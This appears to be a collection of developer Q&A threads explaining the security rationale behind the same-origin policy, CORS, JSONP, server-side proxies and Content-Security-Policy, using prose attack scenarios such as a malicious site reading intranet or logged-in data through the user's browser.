What is the rationale behind AJAX cross-domain security? - javascript

Given the simplicity of writing a server side proxy that fetches data across domains, I'm at a loss as to what the initial intention was in preventing client side AJAX from making calls across domains. I'm not asking for speculation, I'm looking for documentation from the language designers (or people close to them) for what they thought they were doing, other than simply creating a mild inconvenience for developers.
TIA

It's to prevent that a browser acts as a reverse proxy. Suppose you are browsing http://www.evil.com from a PC at your office, and suppose that in that office exists an intranet with sensitive information at http://intranet.company.com which is only accessible from the local network.
If the cross domain policy wouldn't exists, www.evil.com could made ajax requests to http://intranet.company.com, using your browser as a reverse proxy, and send that information to www.evil.com with another Ajax request.
This one of the reasons of the restriction I guess.

If you're the author for myblog.com and you make an XHR to facebook.com, should the request send your facebook cookie credentials? No, that would mean that you could request users' private facebook information from your blog.
If you create a proxy service to do it, your proxy can't access the facebook cookies.
You may also be questioning why JSONP is OK. The reason is that you're loading a script you didn't write, so unless facebook's script decides to send you the information from their JS code, you won't have access to it

The most important reason for this limit is a security concern: should JSON request make browser serve and accept cookies or security credentials with request to another domain? It is not a concern with server-side proxy, because it don't have direct access to client environment. There was a proposal for safe sanitized JSON-specific request methods, but it wasn't implemented anywhere yet.

The difference between direct access and a proxy are cookies and other security relevant identification/verification information which are absolutely restricted to one origin.
With those, your browser can access sensitive data. Your proxy won't, as it does not know the user's login data.
Therefore, the proxy is only applicable to public data; as is CORS.

I know you are asking for experts' answers, I'm just a neophyte, and this is my opinion to why the server side proxy is not a proper final solution:
Building a server side proxy is not as easy as not build it at all.
Not always is possible like in a Third Party JS widget. You are not gonna ask all your publisher to declare a DNS register for integrate your widget. And modify the document.domain of his pages with the colateral issues.
As I read in the book Third Party Javascript "it requires loading an intermediary tunnel file before it can make cross-domain requests". At least you put JSONP in the game with more tricky juggling.
Not supported by IE8, also from the above book: "IE8 has a rather odd bug that prevents a top-level domain from communicating with its subdomain even when they both opt into a common domain namespace".
There are several security matters as people have explained in other answers, even more than them, you can check the chapter 4.3.2 Message exchange using subdomain proxies of the above book.
And the most important for me:
It is a hack.. like the JSONP solution, it's time for an standard, reliable, secure, clean and confortable solution.
But, after re-read your question, I think I still didn't answer it, so Why this AJAX security?, again I think, the answer is:
Because you don't want any web page you visit to be able to make calls from your desktop to any computer or server into your office's intranet

Related

Cross Origin Post Request

I'm trying to send a post request to a different site, specifically Zoho.eu, to enable me to login with one click. Effectively I want to POST to the login URL, my username, password etc etc.
I have ran into the Cross origin problem and I have looked at many different solutions such as JSONP, the iFrame method, CORS etc but all of these require me to have access to the third party backend which I don't have.
How do I get around this problem? I understand I can use a proxy somehow to enable me to avoid the cross origin problem but I'm not sure?
Thanks in advance.
If I understand you correctly then the short answer is you can't.
A proxy won't help you to create a session in the user's browser and login. When using a proxy you are doing the requests in behalf of the user from your server, and can't set the required session values to the user's cookies for the target domain.
This is intentional. The whole concept of Same-origin policy/CORS was invented so that others will not be able to do something in behalf of a users in a domain they don't own.
I would consider OAuth, it might be the right way for you to implement this kind of cross-domain login flow.
One easy solution (which is only a temporary fix, you will have to find a more permanent solution for production code) is to hard code the name of the server from where the request is coming in your server controller code and allow access from it.
CORS protection is intented.
Zoho provides cleaner way to authentication to their site with OAuth integration. That is cleaner way to integrate.
Documented clearly here on the steps,
https://www.zoho.com/crm/help/api/using-authentication-token.html
Any other mode of authentication is not allowed and may be blocked by Zoho.
Hope it helps.

Understanding CORS security: what's the use of server allowing browser cross-domain access?

I just found out that in order to allow cross-domain AJAX calls, Access-Control-Allow-Origin header should be set on SERVER side. This looks frustrating to me, let me explain why:
1) Typical use case is that the client wants to make a cross-domain request. I have never heard of a server trying to restrict access from alien webpages. Oh, I remember 'prevent images hotlinking', a funny feature of my hosting, which can be easily beaten by sending fake 'Referrer` header.
2) Even if server wanted to restrict connections from other domains, it's impossible to do this using capabilities of HTTP protocol. I suggest using tokens for that.
3) What's the use of blocking XMLHttpRequests while you still can use jsonp?
Can you explain why is this done that way?
For those who are still reading, there's a bonus question:
4) Do you know a way to prevent any cross-domain request from a webpage? Imagine a junior web developer creating a login form on a page having ads or other scripts potentially sniffing passwords? Isn't this the essence of web security? Why anyone is talking about that?
I have never heard of a server trying to restrict access from alien webpages.
The Same Origin Policy is a restriction imposed by browsers, not servers.
CORS is the server telling the browser that it can relax its normal security because the data doesn't need that level of protection.
Even if server wanted to restrict connections from other domains, it's impossible to do this using capabilities of HTTP protocol.
Which is why HTTP the protocol isn't used for that.
I suggest using tokens for that.
Using a nonce to protect against CSRF solves a different problem.
It's a relatively expensive solution that you only need to get out when it is the side effects of the request that can be problematic (e.g. "Post a new comment") rather then the data being passed back to JavaScript running on another site.
You couldn't use them instead of the Same Origin Policy to protect against reading data across origins because (without the Same Origin Policy) the attacking site would be able to read the token.
What's the use of blocking XMLHttpRequests while you still can use jsonp?
You can't use JSONP unless the server provides the data in JSONP.
Providing the data in JSONP and using CORS to grant permission to access resources are two different ways that the server can allow the browser to access data that is normally protected by the Same Origin Policy.
JSONP was a hack. CORS came later and is more flexible (since it can allow access to any kind of data, respond to request methods other than GET, and allow custom HTTP headers to be added).
Can you explain why is this done that way?
The default policy is "No Access" since there is no way for the browser to know if the data being requested is public or not.
Consider this situation:
Alice has an account on Bob's website. That account is password protected and has information that should be kept secret between Alice and Bob (bank records or exam results, for example).
Mallory has another website. It uses Ajax to try to access Bob's site.
Without the Same Origin Policy, Alice might (while logged in to Bob's site) visit Mallory's website. Without Alice's knowledge or permission, Mallory's website sends JavaScript to Alice's browser that uses Ajax to fetch data from Bob's site. Since it is coming from Alice's browser, all of Alice's private information is given to the JavaScript. The JavaScript then sends it to Mallory.
This is clearly not a good thing.
The Same Origin Policy prevents that.
If Bob, as the person running the site, decides that the information is not secret and can be shared publicly, then he can use CORS or JSONP to provide access to it to JavaScript running on other sites.
Do you know a way to prevent any cross-domain request from a webpage.
No. The webpage is a single entity. Trying to police parts of it from other parts is a fool's errand.
Imagine a junior web developer creating a login form on a page having ads or other scripts potentially sniffing passwords? Isn't this the essence of web security? Why anyone is talking about that?
"Be careful about trusting third party scripts" is something that doesn't get mentioned as much as it should be. Thankfully, most ad providers and CDN hosted libraries are supplied by reasonably trustworthy people.
Do you know an easy way of overcoming the problem of missing Access-Control-Allow-Origin
Configure the server so it isn't missing.
Use JSONP instead
Use a proxy that isn't blocked by the same origin policy to fetch the data instead (you won't get any credentials the browser might send because Alice has an account with Bob though).

Secure JavaScript Running on 3rd Party Sites

We have a "widget" that runs on 3rd party websites, that is, anyone who signs up with our service and embeds the JavaScript.
At the moment we use JSONP for all communication. We can securely sign people in and create accounts via the use of an iFrame and some magic with detecting load events on it. (Essentially, we wait until the iFrames source is pointing back to the clients domain before reading a success value out of the title of it).
Because we're running on JSONP, we can use the browsers HTTP cookies to detect if the user is logged in.
However, we're in the process of transitioning our system to run realtime and over web sockets. We will still have the same method for authentication but we won't necessarily be making other calls using JSONP. Instead those calls will occur over websockets (using the library Faye)
How can I secure this? The potential security holes is if someone copies the JavaScript off an existing site, alters it, then gets people to visit their site instead. I think this defeats my original idea of sending back a secure token on login as the malicious JavaScript would be able to read it then use it perform authenticated actions.
Am I better off keeping my secure actions running over regular JSONP and my updates over WebSockets?
Websocket connections receive cookies only during the opening handshake. The only site that can access your websocket connection is the one that opened it, so if you're opening your connection after authentication then I presume your security will be comparable to your current JSONP implementation.
That is not to say that your JSONP implementation is secure. I don't know that it isn't, but are you checking the referrers for your JSONP requests to ensure they're really coming from the same 3rd-party site that logged in? If not, you already have a security issue from other sites embedding your javascript.
In any case, the 3rd-party having an XSS vulnerability would also be a very big problem, but presumably you know that already.
Whether you are sent cookies during opening WebSocket handshake by browser (and if so, what cookies) is not specified by the WS spec. It's left up to browser vendors.
A WS connection can be opened to any site, not only the site originally serving the JS doing the connection. However, browsers MUST set the "Origin" HTTP header in the WS opening handshake to the one originally serving the JS. The server is then free to accept or deny the connection.
You could i.e. generate a random string in JS, store that client side, and let that plus the client IP take part in computing an auth token for WS ..

Cross-Origin Resource Sharing (CORS) - am I missing something here?

I was reading about CORS and I think the implementation is both simple and effective.
However, unless I'm missing something, I think there's a big part missing from the spec. As I understand, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to authenticate the request. Hence, again if I'm not missing something, CORS actually makes it easier to steal sensitive information.
I think it would have made much more sense if the original site could also supply an immutable list of servers its page is allowed to access.
So the expanded sequence would be:
Supply a page with list of acceptable CORS servers (abc.com, xyz.com, etc)
Page wants to make an XHR request to abc.com - the browser allows this because it's in the allowed list and authentication proceeds as normal
Page wants to make an XHR request to malicious.com - request rejected locally (ie by the browser) because the server is not in the list.
I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply the closing of the script tag multi-site loophole.
I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?
What about it? You can already do that without CORS. Even back as far as Netscape 2, you have always been able to transfer information to any third-party site through simple GET and POST requests caused by interfaces as simple as form.submit(), new Image or setting window.location.
If malicious code has access to sensitive information, you have already totally lost.
3) Page wants to make an XHR request to malicious.com - request rejected locally
Why would a page try to make an XHR request to a site it has not already whitelisted?
If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.
Your worries are completely valid.
However, more worrisome is the fact that there doesn't need to be any malicious code present for this to be taken advantage of. There are a number of DOM-based cross-site scripting vulnerabilities that allow attackers to take advantage of the issue you described and insert malicious JavaScript into vulnerable webpages. The issue is more than just where data can be sent, but where data can be received from.
I talk about this in more detail here:
http://isisblogs.poly.edu/2011/06/22/cross-origin-resource-inclusion/
http://files.meetup.com/2461862/Cross-Origin%20Resource%20Inclusion%20-%20Revision%203.pdf
It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making a stricter cross domain policy on other tags (script/image) while being more secure, would break a lot of existing code, and make it much more difficult to adopt the new technology. Hopefully, something will be done to close that security hole, but I think they need to make sure its an easy transition first.
I also checked out the official CORS spec and could not find any mention of this issue.
Right. The CORS specification is solving a completely different problem. You're mistaken that it makes the problem worse - it makes the problem neither better nor worse, because once a malicious script is running on your page it can already send the data anywhere.
The good news, though, is that there is a widely-implemented specification that addresses this problem: the Content-Security-Policy. It allows you to instruct the browser to place limits on what your page can do.
For example, you can tell the browser not to execute any inline scripts, which will immediately defeat many XSS attacks. Or—as you've requested here—you can explicitly tell the browser which domains the page is allowed to contact.
The problem isn't that a site can access another sites resources that it already had access to. The problem is one of domain -- If I'm using a browser at my company, and an ajax script maliciously decides to try out 10.0.0.1 (potentially my gateway), it may have access simply because the request is now coming from my computer (perhaps 10.0.0.2).
So the solution -- CORS. I'm not saying its the best, but is solves this issue.
1) If the gateway can't return back the 'bobthehacker.com' accepted origin header, the request is rejected by the browser. This handles old or unprepared servers.
2) If the gateway only allows items from the myinternaldomain.com domain, it will reject an ORIGIN of 'bobthehacker.com'. In the SIMPLE CORS case, it will actually still return the results. By default; you can configure the server to not even do that. Then the results are discarded without being loaded by the browser.
3) Finally, even if it would accept certain domains, you have some control over the headers that are accepted and rejected to make the request from those sites conform to a certain shape.
Note -- the ORIGIN and OPTIONS headers are controlled by the requester -- obviously someone creating their own HTTP request can put whatever they want in there. However a modern CORS compliant browser WONT do that. It is the Browser that controls the interaction. The browser is preventing bobthehacker.com from accessing the gateway. That is the part you are missing.
I share David's concerns.
Security must be built layer by layer and a white list served by the origin server seems to be a good approach.
Plus, this white list can be used to close existing loopholes (forms, script tag, etc...), it's safe to assume that a server serving the white list is designed to avoid back compatibility issues.

What are the disadvantages to using a PHP proxy to bypass the same-origin policy for XMLHttpRequest?

http://developer.yahoo.com/javascript/howto-proxy.html
Are there disadvantages to this technique? The advantage is obvious, that you can use a proxy to get XML or JavaScript on another domain with XMLHttpRequest without running into same-origin restrictions. However, I do not hear about disadvantages over other methods -- are there, and what might they be?
Overhead - things are going to be a bit slower because you're going through an intermediary.
There are security issues if you allow access to any external site via the proxy - be sure to lock it down to the specific site (and probably specific URL) of the resource you're proxying.
Overhead -- both for the user (who know hsa to wait for you server to make and receive data from the proxied source) and you (as you're now taking on all the traffic for the other server in addition to your own).
Also security concerns -- if you are using a proxy to bypass browser security checks for displaying untrusted content, you are deliberately sabotaging the browser security model -- potentially allowing the user to be compromised -- so unless you absolutely trust the server you are communicating with (that means no random ads, no user defined content in the page[s] you are proxying) you should not do this.
I suppose there could be security considerations, though others are likely to be more qualified than me to address that. I've been running such a proxy on my personal site for a while now and haven't run into problems.

Categories